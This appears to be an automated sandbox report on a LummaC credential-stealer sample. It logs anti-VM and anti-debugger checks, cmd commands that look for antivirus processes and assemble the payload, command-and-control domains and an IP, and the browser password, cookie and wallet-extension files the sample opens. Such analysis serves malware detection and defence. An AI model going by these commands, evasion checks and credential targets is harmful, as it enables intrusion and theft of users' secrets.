Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\768400	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior

Source: vUcZzNWkKc.exe, vUcZzNWkKc.exe, 00000000.00000002.1747886194.0000000000F26000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: Set-up.exe.0.dr	Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: vUcZzNWkKc.exe, 00000000.00000002.1745528277.0000000000612000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: vmware
Source: Set-up.exe, 00000002.00000003.1984043815.00000000008D2000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000002.00000002.1985183549.00000000008D2000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000002.00000003.1983744365.00000000008D2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll "name": "blhNatbBSsEYSdWeJJQpapxBabCs.exe", "pid": 7144 }, { "name": "blhNatbBSsEYSdWeJJQpapxBabCs.exe", "pid": 6268 }, { "name": "blhNatbBSsEYSdWeJJQpapxBabCs.exe", "pid": 6444 }, { "name": "blhNatbBSsEYSdWeJJQpapxBabCs.exe", "pid": 6640 }, { "name": "blhNatbBSsEYSdWeJJQpapxBabCs.exe", "pid": 6876 }, { "name": "blhNatbBSsEYSdWeJJQpapxBabCs.exe", "pid": 6956 }, { "name": "blhNatbBSsEYSdWeJJQpapxBabCs.exe", "pid": 6208 }, { "name": "blhNatbBSsEYSdWeJJQ
Source: Set-up.exe	Binary or memory string: Hyper-V RAW
Source: vUcZzNWkKc.exe, vUcZzNWkKc.exe, 00000000.00000003.1703263673.0000000005100000.00000004.00001000.00020000.00000000.sdmp, vUcZzNWkKc.exe, 00000000.00000002.1745528277.0000000000612000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: DetectVirtualMachine
Source: Set-up.exe.0.dr	Binary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\recent_filesprocessesuptime_minutesC:\Windows\System32\VBox.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: vUcZzNWkKc.exe, 00000000.00000003.1703263673.0000000005100000.00000004.00001000.00020000.00000000.sdmp, vUcZzNWkKc.exe, 00000000.00000002.1745528277.0000000000612000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: <Module>laddad.exeProgramStubWriterRunnerRunTimeAntiAntismscorlibSystemObjectdelaydelayTimeantiVMantiSandboxantiDebugantiEmulatorenablePersistenceenableFakeErrorencryptTypecompressedcversSystem.Collections.GenericList`1fileNamesfileTypesfileRunTypesfileDropPathsMainDecompressEncryptOrDecryptXORDecryptEncryptInitalizeIEnumerable`1EncryptOutputSwapGetResourceRunOnStartup.ctorWriteAllBytesExecuteDetectVirtualMachineGetModuleHandleDetectSandboxieCheckRemoteDebuggerPresentDetectDebuggerCheckEmulatordatatextkeysijfileregNameAppPathHidefileBytesfinalPathpathrunTypelpModuleNamehProcessisDebuggerPresentSystem.ReflectionAssemblyTitleAttributeAssemblyDescriptionAttributeAssemblyCompanyAttributeAssemblyProductAttributeAssemblyCopyrightAttributeAssemblyTrademarkAttributeAssemblyFileVersionAttributeAssemblyVersionAttributeSystem.Runtime.InteropServicesComVisibleAttributeGuidAttributeSystem.Runtime.CompilerServicesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeladdadEnvironmentExitSystem.ThreadingThreadSleepget_ItemStringop_EqualitySystem.TextEncodingget_UnicodeGetBytesConcatSystem.IOPathCombineget_CountMemoryStreamSystem.IO.CompressionDeflateStreamStreamCompressionModeCopyToIDisposableDisposeToArrayByteSystem.CoreSystem.LinqEnumerable<EncryptInitalize>b__0Func`2CS$<>9__CachedAnonymousMethodDelegate1CompilerGeneratedAttributeRangeSelect<>c__DisplayClass3<EncryptOutput>b__2bAssemblyGetExecutingAssemblySystem.ResourcesResourceManagerGetObjectAppDomainget_CurrentDomainget_FriendlyNameFileExistsGetEntryAssemblyget_Locationop_InequalityCopyFileAttributesGetAttributesSetAttributesMicrosoft.Win32RegistryRegistryKeyLocalMachineget_UTF8GetStringOpenSubKeySetValueCurrentUserException.cctorConvertFromBase64StringAddGetTempPathSystem.DiagnosticsProcessProcessStartInfoget_StartInfoset_FileNameStartSystem.ManagementManagementObjectSearcherManagementObjectCollectionGetManagementObjectEnumeratorGetEnumeratorManagementBaseObjectget_CurrentToStringToLowerToUpperInvariantContainsMoveNextDllImportAttributekernel32.dllIntPtrToInt32GetCurrentProcessget_HandleDateTimeget_Nowget_Ticksin1jhvfotsq.resources
Source: vUcZzNWkKc.exe, 00000000.00000002.1749214354.000000000125C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y &XCs
Source: vUcZzNWkKc.exe, 00000000.00000002.1747886194.0000000000F26000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: Set-up.exe, 00000002.00000003.1745060264.00000000006D7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: mY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSFsion\Uninstall\{90160000-008C-0000-0000-0000000FF1CE}00000FF1CE}\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-0000-0000000FF1CE}

Source: C:\Users\user\Desktop\vUcZzNWkKc.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\vUcZzNWkKc.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\vUcZzNWkKc.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	File opened: NTICE
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	File opened: SICE
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe

Code function: 1_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,

1_2_00406328

Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\vUcZzNWkKc.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

LummaC encrypted strings found

Source: Climb.com, 0000000D.00000003.1919033995.000000000143B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: hummskitnj.buzz
Source: Climb.com, 0000000D.00000003.1919033995.000000000143B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: cashfuzysao.buzz
Source: Climb.com, 0000000D.00000003.1919033995.000000000143B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: appliacnesot.buzz
Source: Climb.com, 0000000D.00000003.1919033995.000000000143B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: screwamusresz.buzz
Source: Climb.com, 0000000D.00000003.1919033995.000000000143B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: inherineau.buzz
Source: Climb.com, 0000000D.00000003.1919033995.000000000143B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: scentniej.buzz
Source: Climb.com, 0000000D.00000003.1919033995.000000000143B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: rebuildeso.buzz
Source: Climb.com, 0000000D.00000003.1919033995.000000000143B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: prisonyfork.buzz
Source: Climb.com, 0000000D.00000003.1919033995.000000000143B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: spuriotis.click

Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	Process created: C:\Users\user\AppData\Local\Temp\PasoCattle.exe "C:\Users\user\AppData\Local\Temp\PasoCattle.exe"	Jump to behavior
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	Process created: C:\Users\user\AppData\Local\Temp\Set-up.exe "C:\Users\user\AppData\Local\Temp\Set-up.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Symposium Symposium.cmd & Symposium.cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 768400	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Reflect	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "cocks" Articles	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Maternity + ..\Beaches + ..\Rat + ..\Promise + ..\Zone + ..\Enrolled V	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\768400\Climb.com Climb.com V	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5	Jump to behavior

Source: Climb.com, 0000000D.00000000.1778355931.0000000000AE3000.00000002.00000001.01000000.0000000A.sdmp, Climb.com, 0000000D.00000003.1924401119.000000000451E000.00000004.00000800.00020000.00000000.sdmp, Alt.10.dr, Climb.com.3.dr	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: vUcZzNWkKc.exe, vUcZzNWkKc.exe, 00000000.00000002.1747886194.0000000000F26000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: IJProgram Manager

Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe

Code function: 1_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

1_2_00406831

Source: C:\Users\user\AppData\Local\Temp\Set-up.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: vUcZzNWkKc.exe, 00000000.00000002.1763459410.00000000072E4000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000002.00000002.1985722353.00000000012EB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	Binary or memory string: procmon.exe
Source: vUcZzNWkKc.exe, 00000000.00000002.1763459410.00000000072E4000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000002.00000002.1985722353.00000000012EB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	Binary or memory string: wireshark.exe

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Leaks process information

Source: global traffic

TCP traffic: 192.168.2.4:49732 -> 194.87.58.92:80

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
